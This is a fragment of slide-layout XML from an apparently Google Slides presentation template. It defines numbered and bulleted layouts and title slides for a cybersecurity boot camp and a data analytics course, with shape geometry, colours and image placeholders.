            <a:off x="175" y="213537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07" name="Google Shape;407;p24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" name="Google Shape;408;p24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409" name="Google Shape;40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0" name="Google Shape;41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1" name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1230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2" name="Google Shape;412;p24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3" name="Google Shape;413;p24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414" name="Google Shape;41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5" name="Google Shape;41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" name="Google Shape;416;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1259000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7" name="Google Shape;417;p24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24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419" name="Google Shape;41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0" name="Google Shape;42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1" name="Google Shape;421;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="13" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="169712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4. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5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4" name="Google Shape;424;p2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25" name="Google Shape;425;p2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6" name="Google Shape;426;p2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7" name="Google Shape;427;p2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8" name="Google Shape;428;p2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29" name="Google Shape;429;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="430" name="Google Shape;430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1" name="Google Shape;431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2" name="Google Shape;432;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275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34" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435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6" name="Google Shape;436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p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250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 txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572250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39" name="Google Shape;439;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="1345853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="440" name="Google Shape;440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1" name="Google Shape;441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2" name="Google Shape;442;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="193852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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="193858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5. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1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75" y="649650"/>
            <a:ext cx="827450" cy="4115237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2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47" name="Google Shape;447;p2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2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9" name="Google Shape;449;p2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0" name="Google Shape;450;p2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1" name="Google Shape;451;p26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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="21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3" name="Google Shape;453;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="476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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="21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5" name="Google Shape;455;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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26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6. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5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9" name="Google Shape;459;p2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60" name="Google Shape;460;p2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1" name="Google Shape;461;p2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2" name="Google Shape;462;p2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2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64" name="Google Shape;464;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="12527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65" name="Google Shape;465;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190550" y="12765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1133475" y="12765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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="457188" y="19623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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="876063" y="19623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7934400" y="19385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0" name="Google Shape;470;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2622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1" name="Google Shape;471;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="2646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1133856" y="2646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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="514338" y="3408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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="933213" y="3408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7991550" y="3384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6" name="Google Shape;476;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="4095388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7" name="Google Shape;477;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190931" y="4119238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133856" y="4119238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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="1267550"/>
            <a:ext cx="7434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0" name="Google Shape;480;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1944963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1" name="Google Shape;481;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="264817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2" name="Google Shape;482;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12175" y="3394650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3" name="Google Shape;483;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="411922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5460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7. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2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8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7" name="Google Shape;487;p2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88" name="Google Shape;488;p2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" name="Google Shape;489;p2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0" name="Google Shape;490;p2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1" name="Google Shape;491;p2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2" name="Google Shape;492;p28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3" name="Google Shape;493;p28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8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8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8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7" name="Google Shape;497;p28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8" name="Google Shape;498;p28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499" name="Google Shape;499;p2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28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28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="39165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2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8. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1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9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6" name="Google Shape;506;p2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07" name="Google Shape;507;p2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8" name="Google Shape;508;p2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09" name="Google Shape;509;p2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0" name="Google Shape;510;p2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1" name="Google Shape;511;p29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2" name="Google Shape;512;p29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9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9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9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6" name="Google Shape;516;p29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7" name="Google Shape;517;p29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18" name="Google Shape;518;p2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29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t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29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2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9. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1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25" name="Google Shape;525;p3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26" name="Google Shape;526;p3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3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28" name="Google Shape;528;p3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9" name="Google Shape;529;p3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0" name="Google Shape;530;p30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1" name="Google Shape;531;p3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3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3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30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5" name="Google Shape;535;p30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6" name="Google Shape;536;p30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37" name="Google Shape;537;p30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30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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30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. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1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9" name="Google Shape;29;p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 Boot Camp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2" name="Google Shape;32;p4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35" name="Google Shape;3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52144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0. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1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1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3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44" name="Google Shape;544;p3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45" name="Google Shape;545;p3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6" name="Google Shape;546;p3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47" name="Google Shape;547;p3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8" name="Google Shape;548;p3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49" name="Google Shape;549;p31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0" name="Google Shape;550;p31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31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31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1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4" name="Google Shape;554;p31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5" name="Google Shape;555;p31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56" name="Google Shape;556;p31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31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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1. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1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2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3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3" name="Google Shape;563;p3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64" name="Google Shape;564;p3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3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66" name="Google Shape;566;p3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7" name="Google Shape;567;p3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8" name="Google Shape;568;p32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9" name="Google Shape;569;p32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32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32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32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3" name="Google Shape;573;p32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4" name="Google Shape;574;p32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5" name="Google Shape;575;p32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32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77" name="Google Shape;577;p3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32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32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32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6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2. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2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3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3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85" name="Google Shape;585;p3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586" name="Google Shape;586;p3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p3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88" name="Google Shape;588;p3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9" name="Google Shape;589;p3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0" name="Google Shape;590;p33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1" name="Google Shape;591;p33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33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3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3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5" name="Google Shape;595;p33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6" name="Google Shape;596;p33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7" name="Google Shape;597;p33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3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99" name="Google Shape;599;p3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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="201034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33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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="33927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33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6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3. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1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4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3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7" name="Google Shape;607;p3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08" name="Google Shape;608;p3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9" name="Google Shape;609;p3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0" name="Google Shape;610;p3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1" name="Google Shape;611;p3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2" name="Google Shape;612;p34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3" name="Google Shape;613;p34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4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4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4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7" name="Google Shape;617;p34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8" name="Google Shape;618;p34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9" name="Google Shape;619;p34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34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21" name="Google Shape;621;p34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2" name="Google Shape;622;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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34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34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4. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1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5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3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29" name="Google Shape;629;p3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30" name="Google Shape;630;p3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1" name="Google Shape;631;p3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2" name="Google Shape;632;p3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3" name="Google Shape;633;p3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4" name="Google Shape;634;p35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5" name="Google Shape;635;p35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35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35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35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9" name="Google Shape;639;p35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0" name="Google Shape;640;p35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1" name="Google Shape;641;p35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35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43" name="Google Shape;643;p35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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="465" l="0" r="0" t="47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5. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1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6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3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1" name="Google Shape;651;p3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52" name="Google Shape;652;p3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3" name="Google Shape;653;p3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4" name="Google Shape;654;p3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5" name="Google Shape;655;p3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6" name="Google Shape;656;p36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7" name="Google Shape;657;p36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36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36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6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6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6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3" name="Google Shape;663;p36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4" name="Google Shape;664;p36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5" name="Google Shape;665;p36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6" name="Google Shape;666;p36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67" name="Google Shape;667;p3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36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3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36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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3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36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="238" l="0" r="0" t="228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6. Bullets 1–6 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2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7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3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76" name="Google Shape;676;p3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77" name="Google Shape;677;p3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8" name="Google Shape;678;p3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79" name="Google Shape;679;p3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0" name="Google Shape;680;p3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1" name="Google Shape;681;p37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2" name="Google Shape;682;p37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37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37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37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37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37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8" name="Google Shape;688;p37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9" name="Google Shape;689;p37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0" name="Google Shape;690;p37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1" name="Google Shape;691;p37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92" name="Google Shape;692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3" name="Google Shape;693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848847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4" name="Google Shape;694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40985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203272"/>
            <a:ext cx="577804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7. Bullets 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_3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8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3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1" name="Google Shape;701;p3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02" name="Google Shape;702;p3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3" name="Google Shape;703;p3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04" name="Google Shape;704;p3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5" name="Google Shape;705;p3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6" name="Google Shape;706;p38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7" name="Google Shape;707;p38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38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38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38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38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38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3" name="Google Shape;713;p38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4" name="Google Shape;714;p38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5" name="Google Shape;715;p38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6" name="Google Shape;716;p38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17" name="Google Shape;717;p38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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1765" l="0" r="0" t="1774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8. Bullets 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_2_1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39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26" name="Google Shape;726;p3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27" name="Google Shape;727;p3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8" name="Google Shape;728;p3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29" name="Google Shape;729;p3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0" name="Google Shape;730;p3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1" name="Google Shape;731;p39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2" name="Google Shape;732;p39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39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39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39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39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9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8" name="Google Shape;738;p39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9" name="Google Shape;739;p39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40" name="Google Shape;740;p39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41" name="Google Shape;741;p39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42" name="Google Shape;742;p39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39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="46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4" name="Google Shape;744;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="46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p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="46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p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="46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39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="475" l="0" r="0" t="46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9. Bullets 1–7 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2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40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4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1" name="Google Shape;751;p4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52" name="Google Shape;752;p4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3" name="Google Shape;753;p4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4" name="Google Shape;754;p4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5" name="Google Shape;755;p4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6" name="Google Shape;756;p40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7" name="Google Shape;757;p40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40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9" name="Google Shape;759;p40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40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1" name="Google Shape;761;p40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40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3" name="Google Shape;763;p40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40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5" name="Google Shape;765;p40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40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7" name="Google Shape;767;p40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40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69" name="Google Shape;769;p4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40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1" name="Google Shape;771;p4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Google Shape;772;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1037" l="0" r="0" t="1047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4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p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1390" l="0" r="0" t="1380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4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. Title Slide:Data Analytics and Visualization">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_1_1_1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5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9" name="Google Shape;39;p5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1" name="Google Shape;4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93200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5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Analytics and Visualization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3" name="Google Shape;43;p5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46" name="Google Shape;46;p5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0. Bullets 1–7 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1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41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4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79" name="Google Shape;779;p4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80" name="Google Shape;780;p4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1" name="Google Shape;781;p4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82" name="Google Shape;782;p4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3" name="Google Shape;783;p4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4" name="Google Shape;784;p41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5" name="Google Shape;785;p41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41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7" name="Google Shape;787;p41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41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9" name="Google Shape;789;p41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41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1" name="Google Shape;791;p41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41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3" name="Google Shape;793;p41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41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5" name="Google Shape;795;p41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41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97" name="Google Shape;797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8" name="Google Shape;798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9" name="Google Shape;799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0" name="Google Shape;800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1" name="Google Shape;801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2" name="Google Shape;802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794760"/>
            <a:ext cx="520979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1. Bullets 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1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2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4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07" name="Google Shape;807;p4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08" name="Google Shape;808;p4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9" name="Google Shape;809;p4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0" name="Google Shape;810;p4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1" name="Google Shape;811;p4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2" name="Google Shape;812;p42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3" name="Google Shape;813;p42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42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5" name="Google Shape;815;p42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42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7" name="Google Shape;817;p42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42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9" name="Google Shape;819;p42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42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21" name="Google Shape;821;p42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42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23" name="Google Shape;823;p42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42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25" name="Google Shape;825;p42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6" name="Google Shape;826;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2561" l="0" r="0" t="2552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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2892" l="0" r="0" t="2883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2. Bullets 1–7 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_2_1_1_1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3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4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35" name="Google Shape;835;p4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36" name="Google Shape;836;p4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7" name="Google Shape;837;p4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38" name="Google Shape;838;p4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9" name="Google Shape;839;p4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0" name="Google Shape;840;p43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1" name="Google Shape;841;p43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43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3" name="Google Shape;843;p43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43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5" name="Google Shape;845;p43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43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7" name="Google Shape;847;p43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43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9" name="Google Shape;849;p43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43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51" name="Google Shape;851;p43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43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53" name="Google Shape;853;p43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43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1709650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5" name="Google Shape;855;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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6" name="Google Shape;856;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2755163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43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1276" l="0" r="0" t="1276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43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616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43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1616" l="0" r="0" t="1616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3. Bullets 1–8 (Green)">
